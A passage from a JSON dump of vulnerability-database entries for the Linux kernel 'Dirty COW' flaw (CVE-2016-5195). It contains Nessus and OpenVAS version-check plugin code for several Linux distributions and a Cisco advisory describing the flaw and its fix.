value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.4.23-31.54.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.4.23-31.54.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T01:52:20", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2020-05-02T00:00:00", "id": "CENTOS_RHSA-2016-2105.NASL", "href": "https://www.tenable.com/plugins/nessus/94292", "published": "2016-10-27T00:00:00", "title": "CentOS 6 : kernel (CESA-2016:2105) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2105 and \n# CentOS Errata and Security Advisory 2016:2105 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94292);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2020/01/02\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2105\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2016:2105) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-October/022134.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?441b225b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5195\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-642.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T01:59:09", "bulletinFamily": "scanner", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}", "modified": "2020-05-02T00:00:00", "id": "ORACLELINUX_ELSA-2016-3633.NASL", "href": "https://www.tenable.com/plugins/nessus/94224", "published": "2016-10-24T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3633.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94224);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/09/27 13:00:37\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006429.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006430.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3633\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2019-10-14T21:30:17", "bulletinFamily": "software", "description": "A vulnerability in the memory manager functions of the Linux Kernel could allow unauthenticated, local attackers to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nThe vulnerability is due to a race condition in the memory manager functions of the Linux Kernel. An attacker could exploit this vulnerability by racing the madvise (MADV_DONTNEED) system call. An exploit could allow the attacker to gain write access to otherwise read-only memory mappings. A local user could modify on-disk binaries, bypassing the standard permission mechanisms.\n\nOn October 19, 2016, a new vulnerability related to a race condition in the memory manager of the Linux Kernel was disclosed. This vulnerability could allow unprivileged, local users to gain write access to otherwise read-only memory mappings to increase their privileges on the system.\n\nCisco has released software updates that address this vulnerability. For information about affected and fixed software releases, consult the Cisco bug IDs in the Vulnerable Products table.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux\"]", "modified": "2018-08-16T13:48:18", "published": "2016-10-26T15:00:00", "id": "CISCO-SA-20161026-LINUX", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161026-linux", "type": "cisco", "title": "Vulnerability in Linux Kernel Affecting Cisco Products: October 2016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871972", "title": "Fedora Update for kernel FEDORA-2016-c8a0c7eece", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c8a0c7eece\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:15 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c8a0c7eece\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c8a0c7eece\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWMDLBWMGZKFHMRJ7QUQVCERP5QHDB6W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.3~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-10-27T00:00:00", "id": "OPENVAS:1361412562310871676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871676", "title": "RedHat Update for kernel RHSA-2016:2105-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2016:2105-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871676\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-27 05:39:38 +0200 (Thu, 27 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2016:2105-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n 